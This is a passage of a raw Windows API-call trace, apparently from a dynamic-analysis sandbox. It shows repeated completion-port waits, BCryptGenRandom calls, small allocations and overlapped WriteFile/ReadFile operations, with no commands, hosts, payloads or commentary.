[0175.116] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.125] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.126] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.126] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.126] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.126] free (_Block=0x3e305b8) [0175.127] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.127] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.127] free (_Block=0x1fa91d0) [0175.127] free (_Block=0x1fa2ed8) [0175.127] free (_Block=0x1fa90b8) [0175.127] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.127] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.135] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.135] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.136] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.136] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.136] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.136] free (_Block=0x3e305b8) [0175.136] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.136] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.137] free (_Block=0x1fa91d0) [0175.137] free (_Block=0x1fa2ed8) [0175.137] free (_Block=0x1fa90b8) [0175.137] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.139] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.163] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.164] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.164] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.165] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.165] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.165] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.165] free (_Block=0x3e305b8) [0175.165] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.165] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.166] free (_Block=0x1fa91d0) [0175.166] free (_Block=0x1fa2ed8) [0175.166] free (_Block=0x1fa90b8) [0175.166] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.169] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.170] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.170] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.171] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.171] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.171] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.171] free (_Block=0x3e305b8) [0175.171] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.171] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.172] free (_Block=0x1fa91d0) [0175.172] free (_Block=0x1fa2ed8) [0175.172] free (_Block=0x1fa90b8) [0175.172] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.172] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.174] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xee50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.174] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.322] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.323] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.323] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.323] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.324] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.324] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.324] free (_Block=0x3e305b8) [0175.324] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.324] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.324] free (_Block=0x1fa91d0) [0175.324] free (_Block=0x1fa2ed8) [0175.324] free (_Block=0x1fa90b8) [0175.324] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.326] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x8ba0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.326] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.328] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0175.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.331] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x704e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0175.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.418] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.418] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.418] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.418] free (_Block=0x3e305b8) [0175.418] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.418] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.419] free (_Block=0x1fa91d0) [0175.419] free (_Block=0x1fa2ed8) [0175.419] free (_Block=0x1fa90b8) [0175.419] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.438] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.458] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.458] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.458] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.459] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.459] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.459] free (_Block=0x3e305b8) [0175.459] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.459] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.459] free (_Block=0x1fa91d0) [0175.460] free (_Block=0x1fa2ed8) [0175.460] free (_Block=0x1fa90b8) [0175.460] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0175.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.461] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x59f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0175.462] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.476] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.477] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.477] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.477] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.477] free (_Block=0x3e305b8) [0175.477] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.477] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.478] free (_Block=0x1fa91d0) [0175.478] free (_Block=0x1fa2ed8) [0175.478] free (_Block=0x1fa90b8) [0175.478] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.503] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xfc0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.515] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.515] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.515] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.516] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.516] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.516] free (_Block=0x3e305b8) [0175.516] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.516] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.516] free (_Block=0x1fa91d0) [0175.516] free (_Block=0x1fa2ed8) [0175.517] free (_Block=0x1fa90b8) [0175.517] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.525] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.525] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.525] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.526] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.526] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.526] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.526] free (_Block=0x3e305b8) [0175.526] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.526] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.527] free (_Block=0x1fa91d0) [0175.527] free (_Block=0x1fa2ed8) [0175.527] free (_Block=0x1fa90b8) [0175.527] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.534] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.534] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.534] free (_Block=0x3e305b8) [0175.534] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.534] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0175.535] free (_Block=0x1fa91d0) [0175.535] free (_Block=0x77d7a8) [0175.535] free (_Block=0x1fa90b8) [0175.535] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.538] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.556] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.557] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.557] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.557] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.557] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.557] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.558] free (_Block=0x3e305b8) [0175.558] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.558] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.558] free (_Block=0x1fa91d0) [0175.558] free (_Block=0x1fa2ed8) [0175.558] free (_Block=0x1fa90b8) [0175.558] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.566] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.567] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.567] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.567] free (_Block=0x3e305b8) [0175.567] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.567] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.567] free (_Block=0x1fa91d0) [0175.567] free (_Block=0x1fa2ed8) [0175.567] free (_Block=0x1fa90b8) [0175.567] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.583] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.583] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.583] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.583] free (_Block=0x3e305b8) [0175.583] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.583] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.584] free (_Block=0x1fa91d0) [0175.584] free (_Block=0x1fa2ed8) [0175.584] free (_Block=0x1fa90b8) [0175.584] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.585] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: 